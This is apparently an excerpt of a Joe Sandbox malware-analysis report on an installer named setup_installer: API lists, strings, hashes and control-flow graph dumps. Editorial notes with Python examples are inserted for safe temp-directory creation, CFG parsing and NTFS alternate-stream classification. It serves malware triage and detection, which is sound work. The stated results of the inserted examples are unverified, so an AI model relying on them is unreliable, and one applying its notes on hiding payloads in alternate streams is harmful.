                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                        • Instruction ID: 8d5b1ebed930f7aebe848b96ddff61a25dc6a55b7fd75e971453d958bc1fd6fb
                                        • Opcode Fuzzy Hash: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                        • Instruction Fuzzy Hash: D7E092B000010456CF20AF24CC45AEA37BCAF91328F1041BAA960772D0DB38F94ACB9C

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00401951: GetVersionExW.KERNEL32(?), ref: 0040196B
                                        • GetCommandLineW.KERNEL32(?,?,00000000), ref: 0040106A
                                          • Part of subcall function 0040B77A: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0040B783
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CommandLineMessageVersion
                                        • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$BeginPrompt$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$Progress$RunProgram$Title$Unsupported Windows version$setup.exe
                                        • API String ID: 1181637900-2745836148
                                        • Opcode ID: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                        • Instruction ID: 78f7f2e9f043a6e6e6b7956f289dc4eafbfd083bebb4df73e2f95e0f672d6238
                                        • Opcode Fuzzy Hash: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                        • Instruction Fuzzy Hash: 6F320971800119AACF15BFA2CC52AEDBF39AF04319F1084BFE515761E2DB395A89CF58

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                        • Instruction ID: 00b1766c458623f5937beb69801fb3c22a2eab9a989783d6d676752ba79aceb1
                                        • Opcode Fuzzy Hash: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                        • Instruction Fuzzy Hash: 7041AD71940358BFDB24CFA4DC99AEA7BB8EB09710F20456FE852933A1D7384C81CB58

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0040493C
                                        • GetTickCount.KERNEL32 ref: 00404947
                                        • GetCurrentProcessId.KERNEL32(?,00000000,00404A99,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00404952
                                        • GetTickCount.KERNEL32 ref: 004049B1
                                        • SetLastError.KERNEL32(000000B7,00000000,?,00000000,00404A99,?,00000000), ref: 004049E4
                                        • GetLastError.KERNEL32(00000000,?,00000000,00404A99,?,00000000), ref: 00404A0A
                                          • Part of subcall function 0040447D: CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThread
                                        • String ID: .tmp$d
                                        • API String ID: 3074393274-2797371523
                                        • Opcode ID: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                        • Instruction ID: 18cd839078860563eabca9c9166aecfd8bb13a7da93ccbaeff0eff10b9c7e743
                                        • Opcode Fuzzy Hash: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                        • Instruction Fuzzy Hash: D331EDF2A402049BDB14ABB4D84A7AF7B65ABD1319F14413BEA42B72C1D73C8C418B99
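                                        Reading note on function 0040492E: the graph above has the shape of a create-unique-temporary-directory loop. GetCurrentThreadId, GetCurrentProcessId and GetTickCount feed a name that ends in ".tmp"; the subcall at 004051AE decides whether that path already exists and, if so, the function sets ERROR_ALREADY_EXISTS (0xB7) itself; otherwise the subcall at 0040447D issues CreateDirectoryW, GetLastError is inspected, and control returns to the name generator. The example below is added for this edit and is not code from the sample or from Joe Sandbox; it reproduces that loop in portable Python, with os.mkdir standing in for CreateDirectoryW and FileExistsError for ERROR_ALREADY_EXISTS. The name layout, the attempt limit and the tick source are assumptions, since the sample's exact formatting is not visible on this page. The point for a practitioner: every input to the name is guessable by a local user, so the loop must treat a pre-existing directory as a collision and never unpack into it.

```python
import os
import shutil
import tempfile
import threading
import time

# Value seen in the API list above: SetLastError(000000B7) == ERROR_ALREADY_EXISTS.
ERROR_ALREADY_EXISTS = 0xB7


class TempDirError(OSError):
    """Raised when no unique directory could be created."""


def candidate_name(pid: int, tid: int, tick: int, suffix: str = ".tmp") -> str:
    """Directory name built from process id, thread id and a tick value.
    The layout is an assumption; the sample's real formatting is not shown."""
    return f"{pid:08x}-{tid:08x}-{tick:08x}{suffix}"


def create_unique_dir(base: str, tick_source=None, pid=None, tid=None,
                      max_attempts: int = 100) -> str:
    """Create a fresh directory under `base`, retrying on name collisions.

    Mirrors the loop in the report: an exists check that reports
    ERROR_ALREADY_EXISTS, otherwise CreateDirectoryW, then GetLastError
    decides whether to try the next name.
    """
    if tick_source is None:
        tick_source = lambda: int(time.monotonic() * 1000) & 0xFFFFFFFF
    pid = os.getpid() if pid is None else pid
    tid = threading.get_ident() if tid is None else tid
    for _ in range(max_attempts):
        path = os.path.join(base, candidate_name(pid, tid, tick_source()))
        # The sample checks existence first; on its own that is a TOCTOU
        # check, so it must not be the only guard.
        if os.path.lexists(path):
            continue
        try:
            os.mkdir(path, 0o700)   # create-only: fails if the name now exists
        except FileExistsError:     # CreateDirectoryW -> ERROR_ALREADY_EXISTS
            continue                # collision: never reuse what is there
        except OSError as exc:
            raise TempDirError(f"cannot create {path}: {exc}") from exc
        return path
    raise TempDirError(f"no unique name after {max_attempts} attempts")


def collision_demo() -> dict:
    """Plant a directory at the first candidate name (what a local attacker
    could do) and show that the loop skips it.  Returns the names involved."""
    base = tempfile.mkdtemp(prefix="cfgdemo-")
    try:
        pid, tid = 0x1234, 0x5678            # fixed ids for a repeatable run
        ticks = iter([100, 100, 101])        # same tick twice, then a new one
        planted = os.path.join(base, candidate_name(pid, tid, 100))
        os.mkdir(planted)
        chosen = create_unique_dir(base, tick_source=lambda: next(ticks),
                                   pid=pid, tid=tid)
        exhausted = False
        try:   # a name that never changes must give up, not fall back
            create_unique_dir(base, tick_source=lambda: 100,
                              pid=pid, tid=tid, max_attempts=3)
        except TempDirError:
            exhausted = True
        return {
            "planted": os.path.basename(planted),
            "chosen": os.path.basename(chosen),
            "chosen_exists": os.path.isdir(chosen),
            "exhausted": exhausted,
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)
```

                                        collision_demo() plants the tick-100 name, observes the loop move on to tick 101, and confirms that a source of names that never changes ends in an error rather than in reuse of the planted directory.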

                                        Control-flow Graph

                                        control_flow_graph 426 406018-40604b GetModuleHandleW GetProcAddress 427 406078-40608f GlobalMemoryStatus 426->427 428 40604d-406055 GlobalMemoryStatusEx 426->428 430 406091 427->430 431 406094-406096 427->431 428->427 429 406057-406060 428->429 433 406062 429->433 434 40606e 429->434 430->431 432 40609a-40609e 431->432 435 406064-406067 433->435 436 406069-40606c 433->436 437 406071-406076 434->437 435->434 435->436 436->437 437->432
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040603C
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406043
                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406051
                                        • GlobalMemoryStatus.KERNEL32(?), ref: 00406083
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                        • API String ID: 180289352-802862622
                                        • Opcode ID: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                        • Instruction ID: 6939841f741f7d36a15a20a0e3427741af3cfa69e4de5986cbad5950b484ded2
                                        • Opcode Fuzzy Hash: 3e885fa00bb47ba29b610c8aff3464296625ee5c326c36c9750f9013a6749dc4
                                        • Instruction Fuzzy Hash: A9115B749403099BDF10DFA4C949BAEBBF5EB04705F11442EE546B7280D778A894CBA8
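                                        Reading note on the control_flow_graph lines in this section: each is a flattened text dump of the graph image. A basic block is written as an id followed by a start-end address pair (or a single address for a one-instruction block), then the API names and "call <addr>" annotations attached to it; an edge is written as src->dst. The parser below is an added example written for this edit, not part of Joe Sandbox or its IDA plugin. It turns one such line into blocks and edges so that API sequences and successors can be queried without redrawing the graph. The sample input is the dump of function 0040492E copied from above. The one format assumption is that addresses are six hex digits and block ids are shorter decimal numbers, which holds for the 32-bit image in this report.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

_ADDR = re.compile(r"^([0-9a-f]{6})(?:-([0-9a-f]{6}))?$")   # 6-hex-digit addresses (assumption)
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_IDENT = re.compile(r"[A-Za-z_]\w*")


@dataclass
class Block:
    node: int
    start: int
    end: int
    annotations: List[str] = field(default_factory=list)

    def apis(self) -> List[str]:
        """Imported API names on this block: identifier tokens other than the
        'call' keyword that precedes an internal function address."""
        return [t for t in self.annotations if _IDENT.fullmatch(t) and t != "call"]


def parse_cfg(dump: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Parse one control_flow_graph line into {node: Block} and an edge list."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current = None
    prev = ""
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            prev, i = tok, i + 1
            continue
        addr = _ADDR.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        # A block starts with a decimal id followed by an address; an all-digit
        # address after 'call' (e.g. 403204) must not be mistaken for an id.
        if tok.isdigit() and addr and prev != "call":
            start = int(addr.group(1), 16)
            end = int(addr.group(2), 16) if addr.group(2) else start
            current = Block(int(tok), start, end)
            blocks[current.node] = current
            prev, i = tokens[i + 1], i + 2
            continue
        if current is None:
            raise ValueError(f"annotation {tok!r} before any block")
        current.annotations.append(tok)     # API name, 'call', address, '*', count
        prev, i = tok, i + 1
    return blocks, edges


def successors(edges: List[Tuple[int, int]], node: int) -> List[int]:
    return sorted(dst for src, dst in edges if src == node)


def blocks_calling(blocks: Dict[int, Block], api: str) -> List[int]:
    return sorted(b.node for b in blocks.values() if api in b.apis())


def api_calls_in_order(blocks: Dict[int, Block]) -> List[Tuple[int, str]]:
    """(block start address, API) pairs in address order, a quick view of what
    the function imports without reading the whole graph."""
    return [(b.start, a) for b in sorted(blocks.values(), key=lambda b: b.start)
            for a in b.apis()]


# Copied from the report above (function 0040492E).
SAMPLE_DUMP = (
    "control_flow_graph 389 40492e-40495d GetCurrentThreadId GetTickCount "
    "GetCurrentProcessId 390 404961-40496d call 40376e 389->390 393 4049c0-4049c6 "
    "390->393 394 40496f-404971 390->394 395 4049d4-4049dd call 4051ae 393->395 "
    "396 4049c8-4049cf call 4039d8 393->396 397 404973-40497e 394->397 "
    "404 4049ec-4049f1 395->404 405 4049df-4049ea SetLastError 395->405 396->395 "
    "400 404980-404983 397->400 401 404985 397->401 403 404988-404990 400->403 "
    "401->403 403->397 406 404992-40499b 403->406 408 4049f3-4049fd call 405489 "
    "404->408 409 4049ff-404a01 call 40447d 404->409 407 404a1c-404a23 405->407 "
    "410 4049a6-4049b9 call 4039d8 GetTickCount 406->410 411 40499d-4049a1 "
    "call 401ef8 406->411 407->390 414 404a29-404a33 407->414 417 404a06-404a08 "
    "408->417 409->417 423 4049bb-4049bd 410->423 424 4049be 410->424 411->410 "
    "419 404a35-404a39 414->419 421 404a0a-404a13 GetLastError 417->421 "
    "422 404a3c-404a3e 417->422 421->407 425 404a15-404a1a 421->425 422->419 "
    "423->424 424->393 425->407 425->414"
)
```

                                        On the sample, parse_cfg yields 26 blocks and 37 edges; blocks_calling(blocks, "GetTickCount") returns [389, 410], and successors(edges, 421) returns [407, 425], the retry branch after GetLastError.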

                                        Control-flow Graph

                                        control_flow_graph 438 40a53f-40a569 call 418d80 441 40a598-40a59b 438->441 442 40a56b-40a575 call 4031dd 438->442 444 40a5a1-40a5b2 call 4031dd 441->444 445 40a633-40a636 call 40a2c8 441->445 450 40a582 442->450 451 40a577-40a580 442->451 456 40a5c0 444->456 457 40a5b4-40a5be call 4065b9 444->457 449 40a63b-40a647 445->449 453 40a81d-40a826 449->453 454 40a64d-40a651 449->454 455 40a584-40a593 call 4063e5 450->455 451->455 461 40a828-40a82a 453->461 462 40a82e-40a837 453->462 454->453 459 40a657-40a65b 454->459 455->445 458 40a5c3-40a5f3 call 4063e5 call 4037d2 call 4053b3 456->458 457->458 487 40a5f5-40a606 GetLastError 458->487 488 40a626-40a62c 458->488 459->453 465 40a661-40a665 459->465 461->462 467 40a839-40a83b 462->467 468 40a83f 462->468 471 40a670-40a679 465->471 472 40a667-40a66a 465->472 467->468 473 40a841-40a84f 468->473 475 40a7be-40a7c7 471->475 476 40a67f-40a69b call 4032ce 471->476 472->453 472->471 478 40a7c9-40a7cb 475->478 479 40a7cf-40a7d8 475->479 476->475 486 40a6a1-40a6c4 call 409111 476->486 478->479 482 40a7e0-40a7e3 479->482 483 40a7da-40a7dc 479->483 482->473 483->482 495 40a7b5-40a7bd call 403204 486->495 496 40a6ca-40a6e2 call 4032ce 486->496 490 40a608-40a60a 487->490 491 40a60e-40a617 487->491 488->445 490->491 493 40a619-40a61b 491->493 494 40a61f-40a621 491->494 493->494 494->473 495->475 501 40a7a4-40a7af 496->501 502 40a6e8-40a74d call 403740 call 401ef8 call 40a8b7 call 40399c call 403204 call 4037d2 call 4039d8 call 40a891 496->502 501->495 501->496 519 40a768-40a777 call 4053b3 502->519 520 40a74f-40a766 call 4037d2 call 40a891 502->520 526 40a797-40a7a3 call 403204 519->526 527 40a779-40a795 call 409944 call 40a2c8 519->527 520->519 520->526 526->501 527->526 535 40a7e5-40a800 call 403204 * 2 527->535 540 40a802-40a804 535->540 541 40a808-40a811 535->541 540->541 542 40a813-40a815 541->542 543 40a819-40a81b 541->543 542->543 543->473
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040A544
                                        • GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 0040A5F5
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040A2C8: __EH_prolog.LIBCMT ref: 0040A2CD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorExceptionLastThrowmalloc
                                        • String ID: .001$.exe$Split
                                        • API String ID: 1950902910-1819480430
                                        • Opcode ID: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                        • Instruction ID: fbde023dd8d3616a20bf780c395040672d5308453d4d409ddda090532e3e46f0
                                        • Opcode Fuzzy Hash: a476c4b01f0dbe546e0013fe73ee2c3a245c48275de61eff46b60db14b225942
                                        • Instruction Fuzzy Hash: 21A18030A003099FCB14EFA5C585AAEBBB4BF04318F14846EE856BB2D1CB39DE55CB55

                                        Control-flow Graph

                                        control_flow_graph 544 404daf-404dcf call 418d80 call 405780 549 404f83-404f99 call 405719 544->549 550 404dd5-404ddb 544->550 556 404f9b-404f9d 549->556 557 404f9e-404fab call 4055de 549->557 550->549 551 404de1-404e01 call 4036b0 * 2 550->551 564 404e03-404e09 551->564 565 404e0e-404e14 551->565 556->557 562 405000-405007 557->562 563 404fad-404fb3 557->563 569 405013-40501a 562->569 570 405009-40500d 562->570 563->562 566 404fb5-404fc1 call 404da0 563->566 564->565 567 404e16-404e29 call 4032ce 565->567 568 404e2b-404e33 call 4039d8 565->568 571 4050f1-4050f6 call 404b47 566->571 586 404fc7-404fca 566->586 567->568 579 404e38-404e45 call 4056f0 567->579 568->579 572 40504c-405053 call 405693 569->572 573 40501c-405026 call 404da0 569->573 570->569 570->571 585 4050fb 571->585 572->571 592 405059-405064 572->592 573->571 588 40502c-40502f 573->588 594 404e47-404e4a 579->594 595 404e7d-404e87 call 404daf 579->595 590 4050fd-405100 call 404b27 585->590 586->571 591 404fd0-404fed call 404d7d call 40376e 586->591 588->571 593 405035-40504a call 404d7d 588->593 603 405105 590->603 615 404ff9-404ffb 591->615 623 404fef-404ff4 591->623 592->571 598 40506a-405071 call 405596 592->598 593->615 601 404e58-404e70 call 404d7d 594->601 602 404e4c-404e4f 594->602 613 404f71-404f82 call 403204 * 2 595->613 614 404e8d 595->614 598->571 618 405073-4050a6 call 4036b0 call 401ef8 * 2 call 404b47 598->618 620 404e8f-404eb5 call 403740 call 40368d 601->620 622 404e72-404e7b call 4037d2 601->622 602->595 608 404e51-404e56 602->608 609 405107-405115 603->609 608->595 608->601 613->549 614->620 615->590 645 4050a8-4050be wcscmp 618->645 646 4050cb-4050d8 call 404da0 618->646 636 404eba-404ed0 call 404d3d 620->636 622->620 623->615 642 404ed2-404ed6 636->642 643 404f06-404f08 636->643 647 404ed8-404ee5 call 403210 642->647 648 404efe-404f00 SetLastError 642->648 644 404f40-404f6c call 403204 * 2 call 404b27 call 403204 * 2 643->644 644->603 649 4050c0-4050c5 645->649 650 4050c7 645->650 660 405118-405122 call 404d7d 646->660 661 4050da-4050dd 646->661 662 404ee7-404efc call 403204 call 40368d 647->662 663 404f0a-404f10 647->663 648->643 654 405136-40514e call 40376e call 403204 call 404b27 649->654 650->646 654->609 684 405124-405127 660->684 685 405129 660->685 669 4050e4-4050f0 call 403204 661->669 670 4050df-4050e2 661->670 662->636 665 404f12-404f17 663->665 666 404f23-404f3e call 40399c 663->666 665->666 676 404f19-404f1f 665->676 666->644 669->571 670->660 670->669 676->666 689 405130-405133 684->689 685->689 689->654
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00404DB4
                                        • SetLastError.KERNEL32(00000002,?,?,?,:$DATA,?,00000000,?,?,00000001), ref: 00404F00
                                        • wcscmp.MSVCRT ref: 004050B4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLastwcscmp
                                        • String ID: :$DATA
                                        • API String ID: 161073058-2587938151
                                        • Opcode ID: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                        • Instruction ID: da1b248e0d231fcc0c283d7306f0842e77f2967e3c74f92a20ef298db707ecaa
                                        • Opcode Fuzzy Hash: 5f020bb28cd8117265225efec81bdc0651470f94f3d0112356166a414e1d72bb
                                        • Instruction Fuzzy Hash: 8EB1D2719006059ACF24EFA5C841AEEBBB4EF54318F10813FE552772E2DB3D5A49CB58
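                                        Reading note on function 00404DAF: it compares path text against the literal ":$DATA" with wcscmp and, on one path, reports SetLastError(2), ERROR_FILE_NOT_FOUND. That is consistent with handling of NTFS stream syntax, where a file name may carry ":stream" and ":$type" suffixes, "name::$DATA" is the unnamed default data stream, and any other stream name is an alternate data stream. The example below is added for this edit and is not derived from the sample's code; it parses that syntax and classifies a path so that a write to "name:stream" can be told apart from a write to "name". The rule the sample itself applies is not visible on this page, so the treatment of a bare "name:$DATA" as the default stream and the classify() policy are assumptions. For triage the distinction matters because alternate streams are a common place for a dropper to stage a payload that directory listings do not show.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class StreamPath:
    file: str           # path with any stream suffix removed
    stream: str         # "" for the unnamed (default) data stream
    stream_type: str    # "$DATA" unless another type was spelled out
    explicit: bool      # True if the path carried any ':' stream syntax

    @property
    def is_alternate(self) -> bool:
        return self.stream != ""


def parse_stream_path(path: str) -> StreamPath:
    """Split an NTFS path into file, stream name and stream type.

    Only the final path component is examined, so the colon after a drive
    letter ("C:\\...") is never taken for a stream separator.  Grammar assumed:
    file[:stream[:$type]]; a missing type means $DATA; an empty stream name
    means the default data stream.
    """
    cut = max(path.rfind("\\"), path.rfind("/")) + 1
    head, last = path[:cut], path[cut:]
    parts = last.split(":")
    if len(parts) > 3:
        raise ValueError(f"malformed stream syntax: {last!r}")
    name = parts[0]
    stream, stream_type = "", "$DATA"
    if len(parts) == 2 and parts[1].startswith("$"):
        # "name:$DATA": treated as the default stream with an explicit type.
        # Assumption, suggested by the wcscmp against ":$DATA" in the sample.
        stream_type = parts[1]
    elif len(parts) >= 2:
        stream = parts[1]
        if len(parts) == 3 and parts[2]:
            stream_type = parts[2]
    if not stream_type.startswith("$"):
        raise ValueError(f"stream type must start with '$': {stream_type!r}")
    return StreamPath(head + name, stream, stream_type.upper(), len(parts) > 1)


def classify(path: str) -> str:
    """Coarse label for rule writing: what kind of stream a write would touch.
    The categories are this example's own, not the sample's."""
    sp = parse_stream_path(path)
    if sp.stream_type != "$DATA":
        return "non-data-stream"      # e.g. $INDEX_ALLOCATION on a directory
    if sp.is_alternate:
        return "alternate-stream"     # payload hidden beside a normal file
    return "default-stream" if sp.explicit else "plain"
```

                                        A detection rule built on classify() would flag an installer that writes "alternate-stream" paths under the user's profile while letting "plain" and "default-stream" writes through, since the latter two address the same bytes.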

                                        Control-flow Graph

                                        control_flow_graph 694 40ebb1-40ebd4 call 418d80 call 407b3a 699 40ed32-40ed40 694->699 700 40ebda-40ebe3 call 40ed43 694->700 703 40ebe5-40ebe7 700->703 704 40ebec-40ebf1 700->704 703->699 705 40ec02-40ec26 call 4031dd memcpy 704->705 706 40ebf3-40ebf8 704->706 710 40ec2a-40ec31 705->710 706->705 707 40ebfa-40ebfd 706->707 707->699 711 40ec51-40ec6d call 406749 710->711 712 40ec33-40ec41 710->712 717 40ec73-40ec78 711->717 718 40ed25 711->718 712->711 713 40ec43-40ec45 712->713 713->711 714 40ec47-40ec4b 713->714 714->711 716 40ece9-40ecec 714->716 719 40ed27-40ed30 call 403204 716->719 717->716 720 40ec7a-40ec86 717->720 718->719 719->699 722 40ec88-40ec8b 720->722 723 40eccb-40ece4 memmove 720->723 724 40ecb2-40ecb4 722->724 725 40ec8d-40ec91 722->725 723->710 724->723 729 40ecb6-40ecc4 call 40ed43 724->729 727 40ec93-40ec97 725->727 728 40eca8-40eca9 725->728 730 40ec99-40ec9d 727->730 731 40ecab-40ecad 727->731 728->724 737 40ecc6-40ecc9 729->737 738 40ecee-40ed22 memcpy call 406827 729->738 733 40ecaf 730->733 734 40ec9f-40eca4 730->734 731->724 733->724 734->722 736 40eca6 734->736 736->724 737->720 738->718
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                        • Instruction ID: c12524c289feaf3e84e46ecd753a7b8664c50a4f4eb467be383fba77f0e1be85
                                        • Opcode Fuzzy Hash: 72ff1a0eea2013cadeca599a52519994da2caadcde6afb1cc44e6be52f4a8b55
                                        • Instruction Fuzzy Hash: 8D51E071A042069BEB24DF56C885BAEB3B5FF44304F18493AE401B73C1D77DAD558B58

                                        Control-flow Graph

                                        control_flow_graph 741 4019f5-401a30 call 418d80 call 418db0 call 4053b3 748 401b63-401b6b call 405298 741->748 749 401a36-401a3c 741->749 756 401b6d-401b7b 748->756 751 401a4a-401a53 749->751 752 401a3e-401a48 749->752 754 401a61-401a6d 751->754 755 401a55-401a5f 751->755 752->751 752->752 757 401a71-401a88 call 405410 754->757 755->754 755->755 759 401a8d-401a8f 757->759 760 401a95-401a9a 759->760 761 401b5b-401b5d 759->761 762 401aa0-401aa2 760->762 763 401b5f-401b61 760->763 764 401b4f-401b59 call 405298 761->764 766 401aa8-401aae 762->766 763->764 764->756 768 401ab0-401ab5 766->768 769 401aea-401aef 766->769 770 401b10-401b36 memmove 768->770 771 401ab7-401ac8 memcmp 768->771 769->770 772 401af1-401b02 memcmp 769->772 776 401b45-401b4c 770->776 777 401b38-401b3f 770->777 771->763 773 401ace-401ad5 771->773 774 401b04-401b0e 772->774 775 401ae6-401ae8 772->775 773->748 779 401adb-401ae1 call 401b7e 773->779 774->766 775->766 776->764 777->776 778 401a6f 777->778 778->757 779->775
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
